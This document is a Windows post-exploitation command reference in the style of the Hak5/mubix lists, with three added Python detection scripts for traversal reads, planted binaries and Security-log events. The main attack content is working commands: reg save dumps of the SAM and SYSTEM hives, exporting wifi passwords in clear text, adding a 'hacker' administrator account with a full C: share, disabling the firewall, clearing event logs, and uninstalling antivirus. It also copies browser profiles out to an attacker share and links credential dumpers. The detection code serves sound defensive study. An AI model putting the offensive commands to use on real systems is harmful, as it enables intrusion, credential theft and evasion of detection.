Windows Post-Exploitation Command Execution
If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org. You can download these files in any format using the Google Docs File -> Download As method. If you are viewing this on anything other than Google Docs then you can get access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and Windows lists here: http://bit.ly/nuc0N0
DISCLAIMER: Anyone can edit these docs, and all that entails and implies.
Windows Post Exploitation Command List - Page: 1
Table of Contents
Blind Files
Non Interactive Command Execution
System
Networking (ipconfig, netstat, net)
Configs
Finding Important Files
Files To Pull (if possible)
Remote System Access
Auto-Start Directories
Binary Planting
WMI
Reg Command
Deleting Logs
Uninstalling Software AntiVirus (Non interactive)
# Other (to be sorted)
OS SPECIFIC
Win2k3
Vista/7
Vista SP1/7/2008/2008 R2 (x86 & x64)
Invasive or Altering Commands
Support Tools Binaries / Links / Usage
Third Party Portable Tools
Blind Files
Things to pull when all you can do is blindly read, e.g. through LFI or directory traversal: files that will have the same name across networks, Windows domains and systems.

File / Expected Contents or Description

%SYSTEMDRIVE%\boot.ini
    A file that can be counted on to be on virtually every Windows host. Helps to confirm that a read is happening.
%WINDIR%\win.ini
    Another file to look for if boot.ini isn't there or isn't coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
    Stores users' passwords in a hashed format (LM hash and NTLM hash).
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
SEE IMPORTANT FILES SECTION FOR MORE IDEAS
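From the defender's side the same file names make good detection markers: a request whose decoded path climbs out of the web root, or names an absolute Windows path to one of these files, is a blind-read attempt. The script below is an added example and not part of the original command list. It runs over constructed IIS-style access log lines (the fields, client IPs and timestamps are made up for the example) and flags requests that combine a traversal sequence or a drive-letter path with one of the file names in the table above, percent-decoding repeatedly so that `%5c` and double-encoded `%252e` variants are caught.

```python
"""Flag web requests that look like blind-file reads via LFI / directory traversal.

Added example, not part of the original command list. The log lines below are
constructed in IIS W3C style; only cs-uri-stem and cs-uri-query matter here.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# File names from the Blind Files table, lower-cased with forward slashes.
BLIND_FILE_MARKERS = (
    "boot.ini",
    "win.ini",
    "repair/sam",
    "config/regback/sam",
    "repair/system",
    "config/regback/system",
)

# Constructed sample log (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2011-09-01 10:00:01 10.0.0.5 GET /index.php page=home 200
2011-09-01 10:00:02 10.0.0.9 GET /index.php page=../../../../boot.ini 200
2011-09-01 10:00:03 10.0.0.9 GET /index.php page=..%5c..%5c..%5cwindows%5cwin.ini 200
2011-09-01 10:00:04 10.0.0.9 GET /download.aspx file=%252e%252e%252f%252e%252e%252fwindows/repair/sam 200
2011-09-01 10:00:05 10.0.0.7 GET /images/logo.png - 200
2011-09-01 10:00:06 10.0.0.9 GET /index.php page=C:/Windows/System32/config/RegBack/SAM 404
"""

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def normalise(value: str) -> str:
    """Percent-decode repeatedly (catches double encoding), then unify slashes and case."""
    previous = None
    for _ in range(3):  # bounded: a legitimate value decodes once and then stays put
        if value == previous:
            break
        previous, value = value, unquote(value)
    return value.replace("\\", "/").lower()


def is_traversal_read(uri_stem: str, uri_query: str) -> str | None:
    """Return the matched marker when the request targets a blind-file path, else None."""
    target = normalise(f"{uri_stem}?{uri_query}")
    # Either a climb out of the web root or an absolute drive path in a parameter value.
    escapes = "../" in target or re.search(r"(^|[=?&])[a-z]:/", target) is not None
    if not escapes:
        return None
    for marker in BLIND_FILE_MARKERS:
        if marker in target:
            return marker
    return None


def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Return (client ip, raw request, marker) for each suspicious log line."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        _ts, client, _method, stem, query, _status = match.groups()
        marker = is_traversal_read(stem, "" if query == "-" else query)
        if marker:
            hits.append((client, f"{stem}?{query}", marker))
    return hits


if __name__ == "__main__":
    for client, request, marker in scan_log(SAMPLE_LOG):
        print(f"{client} -> {marker}: {request}")
```

The decode loop is bounded on purpose: a value that keeps changing after three decodes is itself suspicious, but the check above does not need to chase it further to reach a verdict.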
Non Interactive Command Execution
System

Command / Expected Output or Description

whoami
    Lists your current user. Not present in all versions of Windows; however it is present in Windows NT 6.0-6.1.
whoami /all
    Lists the current user, their SID, the groups the current user is a member of and their SIDs, as well as the current privilege level.
set
    Shows all current environment variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERSPROFILE.
fsutil fsinfo drives
    Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
    Lists registered executables within the system registry on Windows 7.
Networking (ipconfig, netstat, net)
Command / Expected Output or Description

ipconfig /all
    Displays the full information about your NICs.
ipconfig /displaydns
    Displays your local DNS cache.
netstat -nabo
    XP and up for the -o flag to get the PID.
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING
    XP and up for the -o flag to get the PID.
netstat -na | findstr LISTENING
netsh diag show all
net view
    Queries NBNS/SMB (Samba) and tries to find all hosts in your current workgroup.
net view /domain
net view /domain:otherdomain
net user %USERNAME% /domain
    Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, the last time the password was changed, logon scripts, and group membership.
net user /domain
    Lists all of the domain users.
net accounts
    Prints the password policy for the local system. This can be different from, and superseded by, the domain policy.
net accounts /domain
    Prints the password policy for the domain.
net localgroup administrators
    Prints the members of the Administrators local group.
net localgroup administrators /domain
    As this was supposed to use localgroup & domain, this is actually another way of getting the *current* domain admins.
net group "Domain Admins" /domain
    Prints the members of the Domain Admins group.
net group "Enterprise Admins" /domain
    Prints the members of the Enterprise Admins group.
net group "Domain Controllers" /domain
    Prints the list of Domain Controllers for the current domain.
nbtstat -a [ip here]
net share
    Displays your currently shared SMB entries, and what path(s) they point to.
net session | find "\\"
arp -a
    Lists all the systems currently in the machine's ARP table.
route print
    Prints the machine's routing table. This can be good for finding other networks and static routes that have been put in place.
browstat (Not working on XP)
netsh wlan show profiles
    Shows all saved wireless profiles. You may then export the info for those profiles with the command below.
netsh wlan export profile folder=. key=clear
    Exports a user wifi profile with the password in plaintext to an XML file in the current working directory.
netsh wlan [start|stop] hostednetwork
    Starts or stops a wireless backdoor on a Windows 7 PC.
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
    Complete hosted network setup for creating a wireless backdoor on Win 7.
netsh wlan set hostednetwork mode=[allow|disallow]
    Enables or disables the hosted network service.
wmic ntdomain list
    Retrieves information about the domain and domain controller.
http://www.securityaegis.com/ntsd-backdoor/
Configs
Command / Expected Output or Description

gpresult /z
    Extremely verbose output of GPO (Group Policy) settings as applied to the current system and user.
sc qc <service>
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
    Prints the contents of the Windows hosts file.
Prints a directory listing of the Program Files directory.
echo %COMSPEC%
    Usually going to be cmd.exe in the Windows directory, but it's good to know for sure.
c:\windows\system32\gathernetworkinfo.vbs
    Script included with Windows 7; enumerates registry, firewall config, DNS cache, etc.
Finding Important Files
Command / Description or Reason

tree C:\ /f /a > C:\output_of_tree.txt
    Prints a directory listing in tree format. The /a makes the tree print with ASCII characters instead of special ones and the /f displays file names as well as folders.
dir /a
dir /b /s [Directory or Filename]
dir \ /s /b | find /I searchstring
    Searches the output of dir from the root of the current drive (\) and all subdirectories (/s) using the bare format (/b), so that it outputs the full path for each listing, for searchstring anywhere in the file name or path.
command | find /c /v ""
    Counts the lines of output of whatever you use for command.
Files To Pull (if possible)
File location / Description or Reason

%SYSTEMDRIVE%\pagefile.sys
    Large file, but contains spill-over from RAM; usually lots of good information can be pulled, but it should be a last resort due to its size.
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
    IIS 6 error log.
%SystemDrive%\inetpub\logs\LogFiles
    IIS 7's logs location.
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
unattend.txt, unattend.xml, sysprep.inf
    Used in the automated deployment of Windows images and can contain user accounts. No known default location.
Remote System Access
Command / Description or Reason

net share \\computername
tasklist /V /S computername
    Lists tasks with the users running those tasks on a remote system. This will remove any IPC$ connection after it is done, so if you are using another user, you need to re-initiate the IPC$ mount.
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername
    This maps IPC$, which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed.
net use \\computername /user:DOMAIN\username password
    Using the IPC$ mount with a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system. This is useful when you've gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    Enable remote assistance.
net time \\computername
    Shows the time of the target computer.
dir \\computername\share_or_admin_share\
    Lists a remote directory.
Auto-Start Directories
ver
    Returns the kernel version (like uname on *nix).

Directory / Windows version

%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    Windows NT 6.1, 6.0
%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
    Windows NT 5.2, 5.1, 5.0
%SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\
    Windows 9x
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
    Windows NT 4.0, 3.51, 3.50
Binary Planting
Location or File name / Reason or Description

msiexec.exe
    Idea taken from here: http://goo.gl/E3LTa. Basically, put an evil binary named msiexec.exe in the Downloads directory, and when an installer calls msiexec without specifying a path you get code execution.
%SystemRoot%\System32\wbem\mof\
    Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf (look for the print spooler vuln).
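The msiexec.exe trick works because the directory an installer is launched from is searched before the real %SystemRoot%\System32 copy when no path is given, so the defender's check is a file-system one: does a system-binary name appear anywhere other than where it belongs, and what is sitting in the startup folders from the Auto-Start Directories section above? The Python below is an added example, not part of the original list or of any tool it names. It walks a constructed fixture tree in a temporary folder (on a real host you would pass the actual startup and Downloads folders); msiexec.exe comes from the page, the other binary names in the set are an assumption added for illustration.

```python
"""Audit startup folders and user-writable directories for planted lookalike binaries.

Added example, not part of the original command list. It builds a throwaway directory
tree (constructed fixture) so it runs anywhere; on a real host you would pass the
startup folders from the Auto-Start Directories section and the users' Downloads folders.
"""
from __future__ import annotations

import os
import tempfile
from pathlib import Path

# Names an installer or script may invoke without a full path. msiexec.exe is the page's
# example; the other names are assumed additions for illustration.
SYSTEM_BINARY_NAMES = {"msiexec.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}


def list_startup_entries(startup_dirs: list[str]) -> list[str]:
    """Return every file in the given startup folders; anything here runs at logon."""
    entries = []
    for d in startup_dirs:
        folder = Path(d)
        if not folder.is_dir():
            continue
        for child in sorted(folder.iterdir()):
            if child.is_file() and child.name.lower() != "desktop.ini":
                entries.append(str(child))
    return entries


def find_planted_binaries(search_dirs: list[str], expected_dir: str) -> list[str]:
    """Return files named like a system binary that live outside expected_dir."""
    expected = Path(expected_dir).resolve()
    planted = []
    for d in search_dirs:
        for root, _dirs, files in os.walk(d):
            for name in files:
                if name.lower() in SYSTEM_BINARY_NAMES:
                    full = Path(root, name).resolve()
                    if expected not in full.parents:
                        planted.append(str(full))
    return sorted(planted)


def build_sample_tree(base: str) -> dict[str, str]:
    """Constructed fixture: a fake System32 with the real msiexec.exe, a Downloads folder
    holding a planted copy, and a startup folder with one shortcut and one script."""
    root = Path(base)
    layout = {
        "system32": root / "Windows" / "System32",
        "downloads": root / "Users" / "alice" / "Downloads",
        "startup": root / "ProgramData" / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup",
    }
    for folder in layout.values():
        folder.mkdir(parents=True, exist_ok=True)
    (layout["system32"] / "msiexec.exe").write_bytes(b"MZ legit")
    (layout["downloads"] / "msiexec.exe").write_bytes(b"MZ planted")
    (layout["downloads"] / "setup.exe").write_bytes(b"MZ installer")
    (layout["startup"] / "desktop.ini").write_text("[.ShellClassInfo]")
    (layout["startup"] / "updater.vbs").write_text("' script")
    (layout["startup"] / "Tool.lnk").write_bytes(b"L")
    return {key: str(path) for key, path in layout.items()}


def run_audit() -> dict[str, list[str]]:
    """Build the fixture, run both checks, and return paths relative to the fixture root."""
    with tempfile.TemporaryDirectory() as tmp:
        dirs = build_sample_tree(tmp)
        startup = list_startup_entries([dirs["startup"]])
        planted = find_planted_binaries([dirs["downloads"], dirs["startup"]], dirs["system32"])
        root = Path(tmp).resolve()

        def relative(paths: list[str]) -> list[str]:
            return [str(Path(p).resolve().relative_to(root)) for p in paths]

        return {"startup": relative(startup), "planted": relative(planted)}


if __name__ == "__main__":
    for section, items in run_audit().items():
        print(f"{section}:")
        for item in items:
            print(f"  {item}")
```

Comparing on the file name alone is deliberate: the planted copy passes any "is it called msiexec.exe" test, so location is the only cheap signal, and a hash check against the System32 copy would be the natural next step.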
WMI
wmic bios
wmic qfe
wmic qfe get hotfixid
    Gets the patch IDs.
wmic startup
wmic service
wmic process get caption,executablepath,commandline
wmic process call create process_name
    Executes a program.
wmic process where name=process_name call terminate
    Terminates a program.
wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,size,volumeserialnumber
    Hard drive information.
wmic useraccount
    Usernames, SIDs, and various security related goodies.
wmic useraccount get /ALL
wmic share get /ALL
    You can use ? to get help!
wmic startup list full
    This can be a huge list!!!
wmic /node:"hostname" bios get serialnumber
    This can be great for finding warranty info about the target.
Reg Command
reg save HKLM\Security security.hive
    Save the Security hive to a file.
reg save HKLM\System system.hive
    Save the System hive to a file.
reg save HKLM\SAM sam.hive
    Save the SAM to a file.
reg add [\\TargetIPaddr\][RegDomain]\[Key]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName]
reg query [\\TargetIPaddr\][RegDomain]\[Key] /v [Valuename]
    You can add /s to recurse through all values.
Deleting Logs
wevtutil el
    Lists the logs.
wevtutil cl <LogName>
    Clears the specified log.
del %WINDIR%\*.log /a /s /q /f
Uninstalling Software AntiVirus (Non interactive)
wmic product get name /value
    Gets the software names.
wmic product where name="XXX" call uninstall /nointeractive
    Uninstalls the software.
# Other (to be sorted)
pkgmgr /iu:<Package>
    (useful)
pkgmgr /iu:TelnetServer
    Installs the Telnet service.
pkgmgr /iu:TelnetClient
    Installs the Telnet client.
rundll32.exe user32.dll,LockWorkStation
    Locks the screen (invasive).
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff
OS SPECIFIC
Win2k3
winpop stat domainname
Vista/7
winsat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
bcdedit /export <filename>
Vista SP1/7/2008/2008R2 (x86 & x64)
Enable/Disable Windows features with Deployment Image Servicing and Management (DISM).
*Note* Works well after bypassuac + getsystem (requires system privileges).
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary.
To list features which can be enabled/disabled:
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
To enable a feature (TFTP client for example):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
To disable a feature (again TFTP client):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP
Invasive or Altering Commands
These commands change things on the target and can lead to getting detected.

Command / Description

net user hacker hacker /add
    Creates a new local (to the victim) user called hacker with the password of hacker.
net localgroup administrators /add hacker
net localgroup administrators hacker /add
    Either form adds the new user hacker to the local administrators group.
net share nothing$=C:\ /grant:hacker,FULL /unlimited
    Shares the C drive (you can specify any drive) out as a Windows share and grants the user hacker full rights to access or modify anything on that drive. One thing to note is that in newer Windows versions (will have to look up exactly when, I believe since XP SP2) share permissions and file permissions are separated. Since we added ourselves as a local admin this isn't a problem, but it is something to keep in mind.
net user username /active:yes /domain
    Changes an inactive / disabled account to active. This can be useful for re-enabling old domain admins to use, but it still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
    Disables the local Windows firewall.
netsh firewall set opmode enable
    Enables the local Windows firewall. If rules are not in place for your connection, this could cause you to lose it.
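Each of these actions leaves a Security-log event when auditing is on, which is what "can lead to getting detected" means in practice: account creation is 4720, a member added to a security-enabled local group is 4732, a share created is 5142, an account enabled is 4722, a Windows Firewall setting change is 4950, and the wevtutil cl from the Deleting Logs section shows up as 1102 (audit log cleared). The Python below is an added example, not from the original list: it runs a few correlation rules over constructed event records (hosts, account names and times are made up, and the field names are flattened relative to what an EVTX parser or event forwarding would give) and reports the create-then-promote chain with any share made in the same window, re-enabled accounts, firewall disablement, and log clearing.

```python
"""Correlate Windows Security-log events produced by the commands above.

Added example, not part of the original command list. The event records are constructed
and simplified (real EVTX records nest these under EventData); the event IDs are the
standard ones: 4720 account created, 4732 member added to a security-enabled local group,
5142 network share added, 4722 account enabled, 4950 firewall setting changed,
1102 audit log cleared.
"""
from __future__ import annotations

from datetime import datetime, timedelta

# Constructed sample events: one "net user /add" + "net localgroup administrators /add" +
# "net share" chain, a firewall change, an unrelated re-enabled account, a cleared log,
# and a benign account creation that nobody promotes.
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2011-09-01T10:00:00", "host": "WKS01", "subject": "alice", "target": "alice"},
    {"id": 4720, "time": "2011-09-01T10:01:10", "host": "WKS01", "subject": "svc_backup", "target": "hacker"},
    {"id": 4732, "time": "2011-09-01T10:01:12", "host": "WKS01", "subject": "svc_backup", "target": "hacker",
     "group": "Administrators"},
    {"id": 5142, "time": "2011-09-01T10:01:30", "host": "WKS01", "subject": "svc_backup",
     "share": "\\\\*\\nothing$", "path": "C:\\"},
    {"id": 4950, "time": "2011-09-01T10:02:00", "host": "WKS01", "subject": "svc_backup",
     "setting": "Operational mode", "value": "Off"},
    {"id": 4722, "time": "2011-09-01T11:00:00", "host": "DC01", "subject": "helpdesk1", "target": "old_da"},
    {"id": 1102, "time": "2011-09-01T11:30:00", "host": "WKS01", "subject": "svc_backup"},
    {"id": 4720, "time": "2011-09-02T09:00:00", "host": "DC01", "subject": "helpdesk1", "target": "newhire"},
]


def _when(event: dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def _alert(event: dict, rule: str, detail: str) -> dict:
    return {"time": event["time"], "host": event["host"], "subject": event["subject"],
            "rule": rule, "detail": detail}


def detect(events: list[dict], window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """Run the correlation rules and return alerts in event-time order."""
    ordered = sorted(events, key=_when)
    alerts = []
    for i, ev in enumerate(ordered):
        if ev["id"] == 4720:
            # Rule: the same actor creates an account and drops it into Administrators
            # on the same host within `window`; a share created in that span is noted too.
            follow = [x for x in ordered[i + 1:]
                      if x["host"] == ev["host"] and x["subject"] == ev["subject"]
                      and _when(x) - _when(ev) <= window]
            promoted = any(x["id"] == 4732 and x.get("target") == ev["target"]
                           and x.get("group", "").lower() == "administrators" for x in follow)
            if promoted:
                shares = [x["share"] for x in follow if x["id"] == 5142]
                detail = f"{ev['target']} created and added to Administrators"
                if shares:
                    detail += "; new share(s): " + ", ".join(shares)
                alerts.append(_alert(ev, "new_local_admin", detail))
        elif ev["id"] == 4722:
            # Rule: any re-enabled account is worth a look (net user X /active:yes).
            alerts.append(_alert(ev, "account_reenabled", f"{ev['target']} enabled by {ev['subject']}"))
        elif ev["id"] == 4950 and ev.get("value", "").lower() == "off":
            # Rule: firewall operational mode turned off (netsh firewall set opmode disable).
            alerts.append(_alert(ev, "firewall_disabled", f"{ev.get('setting')} set to Off"))
        elif ev["id"] == 1102:
            # Rule: the Security log was cleared (wevtutil cl Security); always high priority.
            alerts.append(_alert(ev, "audit_log_cleared", "Security log cleared"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']:6} {a['rule']:18} {a['subject']}: {a['detail']}")
```

The 1102 rule is the one that survives the del %WINDIR%\*.log line as well: clearing the Security log writes 1102 into the freshly emptied log, so a forwarded copy of that single event is enough to know the rest is gone.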
Support Tools Binaries / Links / Usage
Command Link to download Description
Third Party Portable Tools
(must be contained in a single executable)
REMEMBER: DO NOT RUN BINARIES YOU HAVEN'T VETTED - BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE

Command / Link to download / Description

carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump
    http://h.ackack.net/carrot-exe.html
    -invasive- Recovers a bunch of passwords.
PwDump7.exe > ntlm.txt
    http://www.tarasco.org/security/pwdump_7/
    -invasive- Dumps Windows NTLM hashes. Holds the credentials for all accounts.
nircmd
    http://www.nirsoft.net/utils/nircmd.html
    A collection of small nifty features.
adfind.exe -b ou=ActiveDirectory,dc=example,dc=com -f "objectClass=user" sn givenName samaccountname -nodn -adcsv > exported_users.csv
    http://www.joeware.net/freetools/
    Joeware tools have been used by admins for a while. This command will output the first name, last name and username of everyone in the AD domain example.com. Edit as needed.
Various tools (e.g. \\hackarmoury.com\tools\all_binaries\fgdump.exe)
    Some examples of protocols in use: http://hackarmoury.com/tools, \\hackarmoury.com\tools, ftp://hackarmoury.com, svn://hackarmoury.com, http://ipv6.hackarmoury.com (IPv6 ONLY)
    HackArmoury.com is a site run by pentesters for pentesters, hosting a wide range of common tools accessible over many different protocols (e.g. Samba, HTTP[S], FTP, RSync, SVN, TFTP, IPv6 etc). The idea is you can access a common toolset from anywhere, without even needing to copy over the binaries to the host in the case of SMB. No registration or authentication required.